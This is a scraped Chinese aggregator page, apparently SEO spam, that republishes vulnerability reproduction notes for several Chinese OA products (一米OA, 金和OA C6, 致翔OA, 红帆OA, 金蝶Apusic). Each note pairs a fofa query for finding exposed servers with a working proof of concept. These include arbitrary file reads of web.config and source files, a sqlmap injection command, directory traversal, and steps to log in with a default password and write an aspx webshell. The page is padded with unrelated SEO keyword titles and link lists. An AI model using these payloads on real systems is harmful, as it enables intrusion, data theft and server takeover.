当前位置: 首页 > news >正文

做网站用什么数据库好用最厉害的搜索引擎

news 2026/4/6 15:23:43
做网站用什么数据库好用,最厉害的搜索引擎,网站logo设计流程,自己做的网站二维码怎么做的一米OA getfile.jsp 任意文件读取漏洞 原文链接 漏洞复现 一米OA getfile.jsp 任意文件读取漏洞 一米OA协同办公系统,集成了OA办公自动化系统、手机客户端、专业报表工具,为全国千万企业用户提供全功能、性价比高的OA软件。一米OA getfile.jsp文件存在任意文件读取漏洞&am…

一米OA getfile.jsp 任意文件读取漏洞

原文链接    漏洞复现 一米OA getfile.jsp 任意文件读取漏洞

一米OA协同办公系统,集成了OA办公自动化系统、手机客户端、专业报表工具,为全国千万企业用户提供全功能、性价比高的OA软件。一米OA getfile.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可获取敏感信息。

漏洞复现

fofaapp="一米OA"     执行如下POC可以读取源码文件

/public/getfile.jsp?user=1&prop=activex&filename=../public/getfile&extname=jsp 

 金和OA C6 download.jsp 任意文件读取漏洞

原文链接https://www.cnblogs.com/hmesed/p/16285307.html

fofa   app="Jinher-OA"

漏洞产生文件为 download.asp

POC构造

http//:x.x.x.x/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

随后就下载一个Web.config文件

 金和OA C6 EditMain.aspx 后台文件写入漏洞

原文漏洞复现 金和OA C6 EditMain.aspx 后台文件写入漏洞

金和OA系统是专业oa协同办公管理平台,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA C6 EditMain.aspx 存在任意文件写入漏洞,通过漏洞可以写入恶意文件获取服务器权限。

漏洞复现

fofaapp="金和网络-金和OA"

1.使用弱密码登录,admin:000000。访问写入大马路径,写入aspx大马->点击保存。

写入大马:/C6/JHSoft.Web.Portal/EditMain.aspx?id=1.aspx

2.访问大马​​​​​​​

/C6/JHSoft.Web.Portal/Default/1.aspx

致翔OA msglog.aspx SQL注入漏洞

原文链接漏洞复现 致翔OA msglog.aspx SQL注入漏洞

致翔OA是集成多个行业应用功能的OA协同办公平台,其核心机制是创新与合作,秉承开放的精神,可以提供嵌入式的OA系统开发支持。致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。

 漏洞复现

fofaapp="致翔软件-致翔OA"

1.注入点如下

python sqlmap.py -u http://{{Hostname}}/mainpage/msglog.aspx?user=1 --dbs

 红帆OA ioFileExport.aspx 任意文件读取漏洞

原文漏洞复现 红帆OA ioFileExport.aspx 任意文件读取漏洞

历经十几年的发展,红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。红帆iOffice.net ioFileExport.aspx处存在任意文件读取,攻击者可以从其中获取网站路径和源码等敏感信息进一步攻击。

0x03 漏洞复现

fofaapp="红帆-ioffice"

1.执行POC得到配置文件、源码等信息

/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream

 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞

原文漏洞复现 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞

金蝶Apusic应用服务器是国内第一个通过J2EE测试认证的应用服务器,全球第四家获得JavaEE 5.0认证授权的产品,完全实现J2EE等企业计算相关的工业规范及标准代码简洁优化,具备了数据持久性、事务完整性、消息传输的可靠性、集群功能的高可用性、以及跨平台的支持等特点。金蝶Apusic应用服务器 server_file处存在目录遍历漏洞,攻击者可以从其中获取网站路径等敏感信息进一步攻击。

0x03 漏洞复现

fofaapp="Apusic-公司产品" && title=="欢迎使用Apusic应用服务器"

1.执行POC得到网站路径

/admin/protected/selector/server_file/files?folder=/

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t JindieOA_server_file_directory_traversal.yaml -l subs.txt -stats

 

http://www.hkea.cn/news/146044/

相关文章:

  • 设置本机外网ip做网站网站免费制作平台
  • 有什么推荐做简历的网站2024的新闻有哪些
  • 申请做网站 论坛版主惠州seo外包服务
  • 网站照片上传不了域名解析ip
  • 胖小七网站建设2022最新国际新闻10条简短
  • wordpress 网站备份厦门seo外包服务
  • 网站建设及推广培训杭州百度快照优化排名
  • 简单手机网站开发软件关键词排名代发
  • visio画网站开发类图注册域名后怎么建网站
  • 道里网站运营培训北京网络营销咨询公司
  • 目前做网站流行的语言seo关键词排名优化哪家好
  • 长沙营销型网站制作费用seo图片优化
  • 学生诚信档案建设网站seo数据分析
  • 北京住房城乡建设厅网站首页1688官网入口
  • 网站建设需要懂什么软件徐州百度seo排名优化
  • wordpress网站样式网站排名查询
  • 郑州网站建设推销外贸网站推广与优化
  • 当当网站开发系统说明搜索引擎排名google
  • 国外男女直接做的视频网站企业邮箱登录入口
  • 成都可以做网站的公司百度手机助手最新版下载
  • 赤峰网站建设招聘市场营销互联网营销
  • 网站开发后端需要哪些技术友情链接检索数据分析
  • 金华竞价排名 金华企业网站建设常见的网络营销平台有哪些
  • p2p网站开发关键词seo是什么意思
  • 自己免费怎么制作网站合肥今天的最新消息
  • 今日头条新闻10条简短seo网络优化招聘信息
  • 赣州人才网官方网站关键词seo优化软件
  • cad做兼职区哪个网站郑州网络营销公司排名
  • 宁夏银川做网站的公司有哪些网络营销分类
  • 换物网站为什么做不起来中国免费广告网